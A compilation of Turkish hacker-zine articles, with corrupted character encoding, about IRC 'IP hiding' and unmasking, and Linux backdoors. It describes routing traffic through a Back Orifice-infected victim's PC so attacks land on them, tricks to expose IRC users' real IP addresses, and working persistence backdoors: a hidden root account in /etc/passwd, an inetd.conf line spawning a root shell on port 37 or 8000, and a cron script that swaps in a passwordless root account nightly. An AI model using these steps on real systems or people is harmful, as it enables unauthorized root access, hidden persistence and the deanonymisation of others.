ip gizleme

bu yaz�da olduk�a de�i�ik ve yararl� bilgilerden bahsedece�iz. �ncelikle bir

�o�umuz bo nun redir komutunu bilmiyor. halbuki �ok i�e yar�yan bir komut. �lk
olarak bu komutu ��renmi� olaca��z. �kinci olarak ipmizi saklamay�, ���nc�
olarakta normalde yawa� ba�land���m�z bir servera h�zl� ba�lanmay� g�rece�iz.
irc de tak�ld���m zamanlar ip spoof olay�na �ok merakl�yd�m. ��nk� IRC de bence
�ok zevkli sawa�lar olurdu. bu sawa�larda galip ��kabilmenin en etkin yolu iyi bir
nuke program� oldu�u kadar ip numaran� oldu�undan farkl� g�stermekti. ip spoof
i�in proxy, wingate gibi yollar var. ama bir �o�unuz bu sefer anlataca��m olay�
bilmiyordur. neyse aidata irc sunucusuna ba�lanmaya �al��yordum. bir s�redir isp
im bu servera yawa� ba�lant� veriyordu. lagda s�r�nd���m zamanlar vard�. Bir g�n
bo ile oynarken (bo yu ��renmenin en iyi yolu onu kendi bilgisayar�na kurmakt�r.)
redir komutunu g�r�m. bu komut redirect port atar victim bilgisayara. bo nun help
dosyas� bu �ek�lde yard�m veriyor bu komut hakk�nda;
rediradd - adds a port redirection
usage: rediradd inputport outputiport,udp
example1: rediradd 33331 205.183.56.7:31337,u
example2: rediradd 1001 207.213.15.11:23
note: if no output port is provided the input port is used.

ben bunu okuyunca i�ime yarayaca��n� d��nerek denemey karar verdim. aidata
serverine en h�zl� ba�lanabilecek isp tabiki aidata net idi. aidatan�n ip
aral���n� bulup boclient( dos komut istemi erisyonu bo nun) ile sweep �ektim. bana
bir kurban verdi. sonra irc.anet.net.tr adresinin dns numaras�n� ald�m. Boclientte
adama host komutu ile ba�lan�p�unu yazd�m�
rediradd 6667 195.174.85.12

paketlerin yerine ba�ar� ile ula�t���n� g�r�nce irc program�m� a��p komu sat�r�na
/server 195.174.80.100 yazd�m. �ak i�te aidata news serverine ba�lanm�t�m. hemde
lags�z....

�imdi gelelim a��klamaya. rediradd komutunda ilk 6667 ba�lanaca��m�z irc servera
hangi portla ba�lanaca��m�z. ondan sonra gelen numara irc serverin dns numaras�.
Sonraki /server 195.174.80.100 sat�r�nda ise normalde /server irc.anet.net.tr
yazars�n�z. ama bo ile girip redir yapt���m� kurban�n ip numaras�n�
(195.174.80.100) yazarsakta yine bu servera ba�lan�r�z. burada ya��t���m�z bir
nevi proxy server a�mak oldu. bu durumda bize nuke atsalar kurban makine ��kecek
siz hemen de�neceksiniz.ip adresimize nas�l bakarsalar baks�nlar kurban�n ipsini
g�recekler.
by tnt-x-treme
irc ip ��renme
pek �ok ki�inin bu sayfay� g�r�nce hehe onda ne var /dns yaz yeter dedi�in g�r�yor
gibiyim. ama bu her irc server i�in ge�erli de�il. bir �ok de�i�ik ip bulma
y�ntemi vard�r. Bu yaz�da bunlardan bahsedece�im. yaz�n�n bir b�l�m� Turkish scene
bir b�l�m� TCG bir b�l�m� ise kendi y�ntemimdir.
y�Ntem 1: en basit ip bulma y�ntemi. pek �ok irc serverda �al��r. komut �ok basit
irc client program�n�zda komut sat�r�na " /dns phyton " yaz�n. Size ip sini
verecektir.
y�Ntem 2: nette g�rd���n�z bir insan�n hangi isp'den ba�land���n� anlama �zerine.
irc'de vs. ip'leri iki �ekilde g�r�r�z:
1: 144.122.2.104 -> direkt ip'yi g�rebiliyoruz.
2: 166.new-york-11-12rs.ny.dial-access.att.net -> superonline'da, doruknet'te vs.
vs. bircok isp'de de g�r�yoruz bu t�r IP'leri..
2. �ekilde g�rm�sek vatanda��n IP'sini;
msdos komut istemine ge�iyoruz ve:

c:\windows>ping 166.new-york-11-12rs.ny.dial-access.att.net
pinging 166.new-york-11-12rs.ny.dial-access.att.net [12.78.196.166] with 32 bytes
of data:
reply from 12.78.196.166: bytes=32 time=1276ms ttl=21
reply from 12.78.196.166: bytes=32 time=1085ms ttl=21
reply from 12.78.196.166: bytes=32 time=919ms ttl=21
ping sonu�lar�n� g�r�yoruz, burada 12.78.196.166 vatanda��m�z�n ip'si.
�imdi gelelim as�l b�l�me, Ip'sini buldu�umuz vatanda��n hangi isp'den
ba�land���n� ya da hangi kurumdan oldu�unu ��renmek i�in,
http://www.ripe.net/db/whois.html sitesine gidiyoruz, burdan search'e t�klay�p
adam�n IP adresini yaziyoruz, i�te kar��m�zda vatanda��n hangi kurumdan nete ba�l�
oldu�u duruyor
y�Ntem 3: irc'de whois yapinca son octeti *** olan (ornek: 212.252.28.***) ornegin
microsoft chatta var bu...adam/hatunlarin ipsini bulmak icin:
once bi whois cekin:
asagidaki ?'lar (aslinda gorulen fakat tarafimdan degistirilmis) sizin
tarafinizdan gorunecek rakamlardir.
*** olanlar ise gercekte goreceginiz rakamlardir(son octet'ler)
/who herifinteki
[whois..] information on herifinteki:
[ident..] ?
[name...] ?
[isp....] 212.252.85.***
[server.] irc.microsoft.com.tr gibi bir sey
[info...] ?
[idle...] 21secs
demek ki herifintekinin ip'sini bilmiyoruz..cunku son octet ***
ba$layin:
/who 212.252.85.1* --> eger herifin adi yoksa 1 yerine 2 deneyin..
3 deyin debeleyin..9 a kadar ...olana kadar...
diyelim ki 2* da bulduk, o zaman:
/who 212.252.85.20*
deneyin..20* den 29* a kadar..ve yine diyelim ki 22* de buldunuz o zaman:
/who 212.252.85.200 : sonra 201,202...,209
diyelim ki 204'te buldunuz:
o zaman ip=???.???.???.67.224'tur.o kadar...
y�Ntem 4: irc'de ip spoof yaparak millete sald�ranlar�n say�s� art�yor.
kullan�c�n�n ip'sine bakt���n�zda manas�z bilgiler g�r�yorsunuz. peki kullan�c�n�n
ger�ek ip'si nas�l al�n�r?
1- �ncelikle muhatab�m�z� bir ��renelim. /whois jp whois'e gelen cevap
jp@this.is.a.spoofed.adres.com
2- /dns this.is.a.spoofed.adres.com komutuna cevap olarak hostmask does not
resolve mesaj� al�yorsak muhatab�m�z ger�ekten ip spoof yap�yor demektir.
3- /quote userip jp komutuyla kar��m�za ne ��k�yor Jp=+jp@130.49.71.21 �te bu
ger�ek ip adresi. (130.49.71.21)
y�Ntem 5: bu y�ntem yine ip nin son octeti gizlenmi� ipler i�in ge�erli. �rene�in
adam�m�z�n nicki lamer ve ipsi 193.192.110.*** diye g�z�k�yor. bu tip iplerde
server gizlemi�tir. yani yine serverda kay�tl� ger�e ip vard�r.!!! bunu ��renmek
i�in chanserv kullanaca��z. ancak bu y�ntem i�in adam�m�z�n nickini register etmi�
olmas� laz�m. �imdi gidip denemelerimiz i�n bir kanal a�al�m. Kanal�m�z�n ismi #1
olsun. adam�m�z� se�tik. "lamer" chanserve bu adm� kobay kanal�m�za founder
yapmas�n� istiyoruz. kanala girip kendimizi founder yapal�m. Daha sonra kanal�n
founderi olarak bu lameri atay�n. En son olarakta /cs info #1 diyerek kanal�n
founderi hakk�nda bilgi al�n. �et bu kadar adamm�z�n ger�ek ipsi ekranda )))
backdoor nedir, nas�l Kullan�l�r (b�l�m i).

(merhaba!!! bu seferki yaz�m�n konusu arka kap�lar, size birka� arka kap�
g�sterece�im. �ok kar��k olmayanlar�ndan, yani kendi linux'�n�zde yaz�y� okur
okumaz deneyebilirsiniz, ve ayr�ca g�sterece�im arka kap�lardan yola ��k�p hayal
g�c�n�z� de kullanarak, �ok ho� arka kap�lar yapabilirsiniz..yaln�z arka kap�lar
"root" elde etmek i�in de�ildir. arka kap�lar �ok �al��p zorla elde etti�iniz
"root"'u sistemde g�venlik delikleri olu�turarak bir sonraki geri d�n��n�z i�in
elinizde tutman�z i�indir.
herneyse, diyelim ki �ok aceleniz var ve hemen bir arka kap� olu�turmak
istiyorsunuz. /etc/passwd dosyas�n� hemen bir programla a��p ortalar�na bir yere
��phe �ekmeyecek bir root hesab� ekleyin ya da dosyan�n derinlerinde bir yerlerde
sistem y�neticisinin daha �nceden dondurdu�u bir hesab�n uid'ini 0 yap�n ve *
i�aretini kald�r�n. bunlar zorunlu kalmad�k�a kullan�lmamas� gereken y�ntemlerdir
ve sistem y�neticisinin en �abuk fark edece�i kap�lard�r. bu y�zden zorunlu
kalmadik�A kullanmayin!!!
�imdi geldik bir inetd.conf arka kap�s�na! ama en e�lencelisini sona
saklad�m..hehe... inetd, sistemin portlar�n� y�kleyen bir programd�r ve ayn�
zamanda arka kap�lar i�in de �ok uygundur. ger�i /etc/inetd.conf dosyas�nda
de�i�iklik yap�larak yarat�lan arka kap�lar�n ya�am s�resi sistem y�neticisine
g�re de�i�ir. pek uzun ya�ayacaklar�n� hi� sanm�yorum; fakat denemeye de�er.
a�a��da kendi bilgisayar�mdaki linux'den ald���m bir /etc/inetd.conf �rne�i var.
(tabii ki hepsi de�il...)
#ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd
#gopher stream tcp nowait root /usr/sbin/tcpd gn
#nntp stream tcp nowait root /usr/sbin/tcpd in.nntpd
#shell stream tcp nowait root /usr/sbin/tcpd in.rshd
#login stream tcp nowait root /usr/sbin/tcpd in.rlogind
#exec stream tcp nowait root /usr/sbin/tcpd in.rexecd
#talk dgram udp wait root /usr/sbin/tcpd in.talkd
#ntalk dgram udp wait root /usr/sbin/tcpd in.ntalkd
#dtalk stream tcp waut nobody /usr/sbin/tcpd in.dtalkd
#pop-2 stream tcp nowait root /usr/sbin/tcpd ipop2d
#pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d
#imap stream tcp nowait root /usr/sbin/tcpd imapd
#uucp stream tcp nowait uucp /usr/sbin/tcpd /usr/lib/uucp/uucico -l
#tftp dgram udp wait root /usr/sbin/tcpd in.tftpd
#bootps dgram udp wait root /usr/sbin/tcpd bootpd
finger stream tcp nowait root /usr/sbin/tcpd in.fingerd -l
#cfingerstream tcp nowait root /usr/sbin/tcpd in.cfingerd
#systat stream tcp nowait guest /usr/sbin/tcpd /bin/ps -auwwx
#netstatstream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f inet
#time stream tcp nowait nobody /usr/sbin/tcpd in.timed
#time dgram udp wait nobody /usr/sbin/tcpd in.timed
#auth stream tcp nowait nobody /usr/sbin/in.identd in.identd -l -e -o
# i�areti linux'e o sat�r� okumamas�n� sa�l�yor. g�rd���n�z gibi benim sadece
telnet ve finger portlar�m a��k. asl�nda normalde ben hi� bir portumu a��k
b�rakmam, ama bu aralar a��k i�te �imdi "bunlarda nedir?" diye soracaks�n�z.
telnet'i ele alal�m. Sat�rdaki birinci b�l�m �al�t�r�lacak daemon'un, yani,
program�n ismidir. �kinci b�l�mdeki stream socket tipidir. tcp'nin socketi stream
,udp'ninkiyse dgram. sonraki b�l�mde ise protocol ismini g�r�yorsunuz. sonraki
b�l�mdeyse program�n hangi kullan�c� t�r� olarak �al�aca�� belirlenir. yani telnet
root (uid=0) olarak �al�acak. be�inci b�l�mde ise program�n bulundu�u dizin var;
fakat benim inetd.conf dosyamda /usr/sbin/tcpd'yi g�r�yorsunuz. tcpd g�venlik i�in
baz� bilgileri kaydeden bir daemon oldu�una g�re, burada telnetin hareketleri
normalde oldu�undan fazla kaydediliyor. son b�l�mdeyse daemonun paremetreleriyle
beraber ger�ek ismini g�r�yorsunuz.
bir de daemonlar�n hangi portlar� ve protocolleri kulland���n� i�eren
/etc/services dosyas� vard�r. Bu dosya sayesinde 23 olan telnet portunu, 7000
yapabiliriz a�a��da bir services �rne�i var:
tcpmux 1/tcp # rfc-1078
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users

daytime 13/tcp
daytime 13/udp
netstat 15/tcp
qotd 17/tcp quote
chargen 19/tcp ttytst source
chargen 19/udp ttytst source
ftp-data 20/tcp
ftp 21/tcp
telnet 23/tcp
smtp 25/tcp mail
time 37/tcp timserver
time 37/udp timserver
rlp 39/udp resource # resource location
name 42/udp nameserver
whois 43/tcp nicname # usually to sri-nic
domain 53/tcp
domain 53/udp
mtp 57/tcp # deprecated
bootps 67/udp # bootp server
bootpc 68/udp # bootp client
tftp 69/udp
gopher 70/tcp # gopher server
rje 77/tcp
finger 79/tcp
http 80/tcp # www is used by some broken
www 80/tcp # progs, http is more correct
link 87/tcp ttylink
kerberos 88/udp kdc # kerberos authentication--udp
kerberos 88/tcp kdc # kerberos authentication--tcp
supdup 95/tcp # bsd supdupd(
hostnames 101/tcp hostname # usually to sri-nic
iso-tsap 102/tcp
x400 103/tcp # iso mail
x400-snd 104/tcp
csnet-ns 105/tcp
pop-2 109/tcp # postoffice v.2
pop-3 110/tcp # postoffice v.3
pop 110/tcp # postoffice v.3
sunrpc 111/tcp
sunrpc 111/tcp portmapper # rpc 4.0 portmapper udp
sunrpc 111/udp
sunrpc 111/udp portmapper # rpc 4.0 portmapper tcp
auth 113/tcp ident # user verification
sftp 115/tcp
uucp-path 117/tcp
nntp 119/tcp usenet # network news transfer
ntp 123/tcp # network time protocol
ntp 123/udp # network time protocol
netbios-ns 137/tcp nbns
netbios-ns 137/udp nbns
netbios-dgm 138/tcp nbdgm
netbios-dgm 138/udp nbdgm
netbios-ssn 139/tcp nbssn
imap 143/tcp # imap network mail protocol
news 144/tcp news # window system
nmp 161/udp
snmp-trap 162/udp
exec 512/tcp # bsd rexecd(
biff 512/udp comsat
login 513/tcp # bsd rlogind(
who 513/udp whod # bsd rwhod(
shell 514/tcp cmd # bsd rshd(
syslog 514/udp # bsd syslogd(
printer 515/tcp spooler # bsd lpd(
talk 517/udp # bsd talkd(
ntalk 518/udp # sunos talkd(
efs 520/tcp # for lucasfilm
route 520/udp router routed # 521/udp too
timed 525/udp timeserver
tempo 526/tcp newdate
courier 530/tcp rpc # experimental
conference 531/tcp chat
netnews 532/tcp readnews
netwall 533/udp # -for emergency broadcasts
uucp 540/tcp uucpd # bsd uucpd( uucp service
klogin 543/tcp # kerberos authenticated rlogin
kshell 544/tcp cmd # and remote shell
new-rwho 550/udp new-who # experimental
remotefs 556/tcp rfs_server rfs # brunhoff remote filesystem
rmonitor 560/udp rmonitord # experimental
monitor 561/udp # experimental
pcserver 600/tcp # ecd integrated pc board srvr
mount 635/udp # nfs mount service
pcnfs 640/udp # pc-nfs dos authentication
bwnfs 650/udp # bw-nfs dos authentication
kerberos-adm 749/tcp # kerberos 5 admin/changepw
kerberos-adm 749/udp # kerberos 5 admin/changepw
kerberos-sec 750/udp # kerberos authentication--udp
kerberos-sec 750/tcp # kerberos authentication--tcp
kerberos_master 751/udp # kerberos authentication
kerberos_master 751/tcp # kerberos authentication
krb5_prop 754/tcp # kerberos slave propagation
listen 1025/tcp listener rfs remote_file_sharing
nterm 1026/tcp remote_login network_terminal
kpop 1109/tcp # pop with kerberos
ingreslock 1524/tcp
tnet 1600/tcp # transputer net daemon
cfinger 2003/tcp # gnu finger
nfs 2049/udp # nfs file service
eklogin 2105/tcp # kerberos encrypted rlogin
krb524 4444/tcp # kerberos 5 to 4 ticket xlator
irc 6667/tcp # internet relay chat
dos 7000/tcp msdos
buraya istedi�inizi ekleyebilirsiniz. �rne�in; ircyi ele alal�m. Ba�taki "irc"
s�zc��� /etc/inetd.conf'un i�inde yer alacak olan isim, 6667 port numaras�, tcp
protokol tipi, # i�aretinden sonraki b�l�mse a��klamas�. Art�k bu anlatt�klar�mdan
sonra, kap�y� nas�l koyaca��n�z� anlataca��m.
kendi servisinizi y�kleyebilirsiniz ya da �nceden y�klenmi� bir servisi
de�i�tirebilirsiniz.
�rne�in, kurban�m�z time olsun.
time stream tcp nowait nobody /usr/sbin/tcpd in.timed
time'�n port numaras� services dosyas�nda 37 olarak belirlendi�i i�in services
dosyas�n� de�i�tirmeye gerek yok. �nemli olan son �� b�l�m. Kap�m�z�n root olarak
�al�mas� �art oldu�u i�in nobody yerine root yaz�n. /usr/sbin/tcpd yerine /bin/sh
yaz�n. Ve son olarak in.timed yerine sh -i yaz�n. Sat�r�n ayn� a�a��daki gibi
olmas� gerekiyor:
time stream tcp nowait root /bin/sh sh -i
hepsi bu kadar! e�er isterseniz riske girip y�netici yerine siz "killall -hup
inetd" yazarak dosyay� tekrar okutabilirsiniz ya da biraz bekleyebilirsiniz. �imdi
tek yapaca��n�z port 37'ye telnet �ekmek. root olarak sistemde bulacaks�n�z
kendinizi...heuehuhu...tek yapaca��n�z kap�n�z� /etc/services dosyas�na tan�tmak
ve inetd.conf'a eklemek. �te size bir �rnek:
inetd.conf --> filter stream tcp nowait root /bin/sh sh -i
services --> filter 8000/tcp backdoor
�te bu kadar. �imdi tek yapaca��n�z "killall -hup inetd" yaz�p, port 8000'e telnet
�ekmek. hi� zor de�il...ama bu kap�lar daha �nce de dedi�im gibi hemen fark
edilir. peki hangileri hemen fark edilmez? c dosyas� �eklinde olan truva atlar�
tabii ki!
ve son olarak /etc/crontab kap�lar�na geldik. sadece bir tane �rnek verece�im,
��nk� hayal g�c�n�z� kullanarak bir s�r� de�i�ik kap� �retebilirsiniz. crond
istedi�iniz zamanda istedi�iniz i�lemi yapman�z� sa�layan �ok yararl� bir ara�t�r.
�imdiki �rnekte, crond 30 saniyeli�ine beg�m isimli bir kullan�c�y� aktif hale
getiriyor. basit ama etkili br �rnek.
nas�l m� yapacaks�n�z? �ok basit, sadece /etc/crontab dosyas�na bir sat�r
gireceksiniz ve birka� shell dosyas� yapacaks�n�z. tabii ki biraz unix bilginizin
oldu�unu d��n�yorum. a�a��da crontab dosyas�ndaki alanlar�n a��klamalar� var:
(1) (2) (3) (4) (5) (6)
dakika saat g�n ay haftan�n�al�t�r�lacak komut ya da dosya
0-59 0-23 1-31 1-12 0-6g�n�
�imdi /var/spool/crond/ ya da /var/spool/mail/ dizinlerinden biri mutlaka
olacakt�r. Varsa /var/spool/crond/, yoksa /var/spool/mail/ dizininin i�ine gidip
"begum" adl� bir dosya yarat�n ve bu dosyan�n i�ine �unlar� girin:
30 23 * * * sh /usr/bin/test
sonra /usr/bin/ dizinine gidin ve test adl� bir dosya yarat�p �u de�i�iklikleri
yap�n:
cp /etc/passwd /etc/passwdd
rm /etc/passwd
cp /etc/tester /etc/passwd
sleep 30
rm /etc/passwd
cp /etc/passwdd /etc/passwd
daha sonra /etc/'ye gidip tester adl� bir dosya yarat�p a�a��dakileri girin:
begum::0:0:begum atac:/:/bin/bash
�te arka kap�n�z haz�r! Her g�n saat 23:30'da 30 saniyeli�ine ger�ek passwd
dosyas� yerine kendi begum isimli root hesab�m�z� aktif hale getiriyoruz! bu �ok
basit ve bir �ok insan�n bildi�i bir kap�d�r. tabii ki hayal g�c�n�z sayesinde �ok
daha karma��k ve iyilerini yaratabilirsiniz.
hepsi bu kadar...size anlatt�klar�m� ba�ka yerlerde de okumu� olabilirsiniz. bana
mail at�p kopyalad��m� s�ylemeyin! neden mi? ��nk� bunlar en �ok bilinen
kap�lard�r, bu nedenle ba�kalar�n�n da anlatm� olmas� �ok normal! herneyse, belki
ba�ka bir say�da kar��k arka kap� �rnekleri veririm, �imdilik bu kadar.
__________________